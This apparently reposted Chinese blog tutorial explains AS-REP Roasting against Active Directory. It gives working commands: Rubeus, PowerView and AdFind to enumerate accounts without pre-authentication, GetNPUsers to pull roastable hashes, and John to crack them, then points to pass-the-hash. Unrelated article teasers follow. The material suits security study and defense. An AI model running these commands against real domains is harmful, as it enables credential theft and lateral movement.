域内攻击 ---> AS-REP Roasting

news2025/1/17 6:10:27

今天,我们就来讲一下另外一种Roasting攻击     AS-REP Roasting

1.AS-REP Roasting原理

其实和kerberoasting一样,这种攻击也是一种暴力破解的攻击,完全取决于攻击者的字典。

但是不同于Kerberoasting,他不需要用户进行注册SPN,他其实就是对AS-REP过程中返回的那张TGT中用了用户的NTLM哈希加密的CT_Sessionkey的字段进行暴力破解,从而得到用户的NTLM哈希,然后进行下一步横向!!

其实通过WireShark我们就能够很清楚的看见了!!

2.AS-REP Roasting的前提

有人这时候就会好奇了,AS-REP的发生,前提不是发生了AS-REQ吗??? 确实呢,默认情况下我们只有在AS-REQ通过(身份,密码等认证通过),KDC才会给我们发一张TGT!!! 但是我们又不知道别的用户的账号密码!!!

  ::这我咋玩????

当然了,和Kerberoasting一样,也是有对应得前提得的,那就是勾选  不要求Kerberos身份预认证

       这个选项是默认没有勾上的,所以AS-REP Roasting的利用难度还是很大的

我们去勾选一下然后抓包,看看对应得流量(这里我用Rubeus这个工具)   

shell Rubeus.exe asreproast /format:john /outfile:hash.txt

然后我们看流量能发现到,即使我们是SEC用户,但是域内勾选了不要求Kerberos预认证的用户WIN7(我们伪造WIN7请求)也返回了用WIN7加密的CT_Sessionkey

3.定位域内不要求kerberos预认证的用户

1.PowerView无文件落地

这个只适用于你在域环境内

powershell-import PowerView.ps1
powershell Get-DomainUser -PreauthNotRequired -Verbose

可以查出来 

2.ADfind

这个工具就老强大啦,假设我们在域内

shell Adfind.exe  -h 192.168.111.138:389  -f  "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn

或者在工作组获取了一个域用户的密码

shell Adfind.exe  -h 192.168.111.138:389 -u rce\sec -up admin@123 -f  "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn

3.Python脚本

当然了,如果我们在工作组中没有用户的密码也是可以的!!!  

这不正是(任意用户枚举,和密码喷洒的原理吗)都是利用的AS-REQ返回的对应值进行判断

但是脚本我没得,你要自己写    

4.获取用户hash加密的CT_Sessionkey

1.Rubeus

这个其实就在上面演示过了,他会自动生成所有勾选了不要求身份认证的用户去进行伪造请求,并且输出到一个文档

2.GetNPUsers

因为有些电脑可能用不了Rubeus这个工具,所以我们用这个

shell GetNPUsers.exe  域名/用户名 -no-pass -dc-ip 域控  >hashes.txt

5.破解用户的TGT

这里破解的方法就有很多了

比如说john

john --wordlist="密码字典"  用户哈希 

或者你用hashcat也不是不可以,我这个配置不支持,你们可以去你们电脑上去试一试

然后通过拿到了对应得hash,如果是高权限得话就可以去PTH了!!!   反正方法很多,能完成认证,一切都好说!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1804465.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

达梦8 探寻达梦排序原理:新排序机制(SORT_FLAG=1)

测试版本:--03134283938-20221019-172201-20018 达梦的排序机制由四个dm.ini参数控制: #maximum sort buffer size in Megabytes ,有效值范围(1~2048) SORT_BUF_SIZE 100 #ma…

深圳中赢娱乐控股集团至江西省宜春市袁州区访问交流

2024年6月7日,深圳中赢娱乐控股集团受邀来到江西省宜春市袁州区就“短剧文旅”项目展开深度座谈,并与飞剑潭乡达成合作意向。 下午2:30,深圳中赢控股集团董事李平进带团队一行12人,访问宜春市袁州区,宜春市副市长谢萍、…

Java——数组排序和查找

一、排序介绍 1、排序的概念 排序是将多个数据按照指定的顺序进行排列的过程。 2、排序的种类 排序可以分为两大类:内部排序和外部排序。 3、内部排序和外部排序 1)内部排序 内部排序是指数据在内存中进行排序,适用于数据量较小的情况…

【HTTP系列】HTTP1.0/1.1/2.0 的区别

文章目录 一、HTTP1.0二、HTTP1.1三、HTTP2.0# 多路复用二进制分帧首部压缩服务器推送 四、总结HTTP1.0:HTTP1.1:HTTP2.0: 参考文献 一、HTTP1.0 HTTP协议的第二个版本,第一个在通讯中指定版本号的HTTP协议版本 HTTP 1.0 浏览器…

OmniGlue: Generalizable Feature Matching with Foundation Model Guidance

【引用格式】:Jiang H, Karpur A, Cao B, et al. OmniGlue: Generalizable Feature Matching with Foundation Model Guidance[J]. arXiv preprint arXiv:2405.12979, 2024. 【网址】:https://arxiv.org/pdf/2405.12979 【开源代码】:https…

c++与c

命名空间的设置: 避免冲突 命名空间: 如果将变量全部定义在全局可能不安全,都可以进行修改。 如果将变量定义在局部,当出了大括号就不能使用。 所以说在定义一个命名空间的时候 定义函数,变量,命名空间…

适用于 Windows 的 8 大数据恢复软件

数据恢复软件可帮助您恢复因意外删除或由于某些技术故障(如硬盘损坏等)而丢失的数据。这些工具可帮助您从硬盘驱动器 (HDD) 中高效地恢复丢失的数据,因为这些工具不支持从 SSD 恢复数据。重要的是要了解,您删除的数据不会被系统永…

嵌入式系统如何尽可能避免存储数据丢失与损坏?

正文 大家好,我是bug菌~ 对于一些需要动态存储数据的嵌入式系统往往我们需要考虑系统在各种状态的数据可靠性问题。当然也不仅仅这些数据敏感的协议,最常见的就是你向存储系统写入数据的过程中给断电了,系统下一次上电跑飞了~ 掉电…

ssm621大湾区旅游推荐系统的设计与实现+vue【已测试】

前言:👩‍💻 计算机行业的同仁们,大家好!作为专注于Java领域多年的开发者,我非常理解实践案例的重要性。以下是一些我认为有助于提升你们技能的资源: 👩‍💻 SpringBoot…

ICLR24大模型提示(8) | 退一步思考:在大型语言模型中通过抽象引发推理

【摘要】我们提出了一种简单的提示技术,即后退提示法,它使 LLM 能够进行抽象,从包含特定细节的实例中得出高级概念和第一原理。通过使用概念和原理来指导推理,LLM 显著提高了遵循正确推理路径解决问题的能力。我们使用 PaLM-2L、G…

Android Media Framework(三)OpenMAX API阅读与分析

这篇文章我们将聚焦Control API的功能与用法,为实现OMX Core、Component打下坚实的基础。 1、OMX_Core.h OMX Core在OpenMAX IL架构中的位置位于IL Client与实际的OMX组件之间,OMX Core提供了两组API给IL Client使用,一组API用于管理OMX组件…

对Java中二维数组的深层认识

首先,在JAVA中,二维数组是一种数组的数组。它可以看作是一个矩阵,通常是由于表示二维数据节后,如表格和网格。 1.声明和初始化二维数组 声明 int[][] arr;初始化 int[][] arrnew int[3][4];或者用花括号嵌套 int[][] arr{{1,…

数据结构 -- 树状数组

前言 树状数组或二叉索引树(Binary Indexed Tree),又以其发明者命名为 Fenwick 树。其初衷是解决数据压缩里的累积频率的计算问题,现多用于高效计算数列的前缀和、区间和。它可以以 O(logn) 的时间得到任意前缀和。并同时支持在 …

Django更改超级用户密码

Django更改超级用户密码 1、打开shell 在工程文件目录下敲入: python manage.py shell再在python交互界面输入: from django.contrib.auth.models import User user User.objects.get(username root) user.set_password(123456) user.save()其中ro…

千行赏金:闲暇时间的价值创造者

在这个高速发展的信息时代,人们的生活节奏越来越快,闲暇时间似乎成为了一种奢侈品。然而,正是这些看似零散的闲暇时间,如果能够妥善利用,也能产生巨大的价值。今天,我要为大家介绍一款能够充分利用闲暇时间…

深度学习 - 梯度下降优化方法

梯度下降的基本概念 梯度下降(Gradient Descent)是一种用于优化机器学习模型参数的算法,其目的是最小化损失函数,从而提高模型的预测精度。梯度下降的核心思想是通过迭代地调整参数,沿着损失函数下降的方向前进&#…

金融领域的AI解决方案

AI可赋能金融营销、资管、风控等领域,面向金融消费者、金融机构和金融监管机构,改善金融 市场信息对称性并提升金融交易的效率和安全性。目前,金融行业各机构对于安全认证和客户身份识别的需求较为迫切,身份识别和智能客服应用和落…

深度解析:AI Prompt 提示词工程的兴起、争议与未来发展

PART1: 提示词工程的兴起 在人工智能领域中,一个新的领域——提示词工程(prompt engineering)——开始显露头角。 这个领域的核心在于精心设计输入,以引导AI模型产生特定的、期望的输出。 随着AI技术的飞速发展,特别…

值类型和引用类型在使用和存储上的区别

使用上的区别 //值类型 int a 10; //引用类型 int[] arr new int[] { 1, 2, 3, 4, 5 };//声明了一个b让其等于之前的a int b a; //声明了一个arr2让其等于之前的arr int[] arr2 arr; Console.WriteLine("a{0},b{1}", a, b); Console.WriteLine("arr[0]{0},…

【JavaEE】Spring Boot 配置文件详解

一.配置文件的相关概念. 配置文件主要用于配置应用程序的行为和属性. Spring Boot的配置文件提供了一种灵活且强大的方式,用于管理应用程序的配置信息。很多项目或框架的配置信息也放在配置文件中: 项目的启动端口.数据库的连接信息(用户名/密码/驱动等的信息).第三…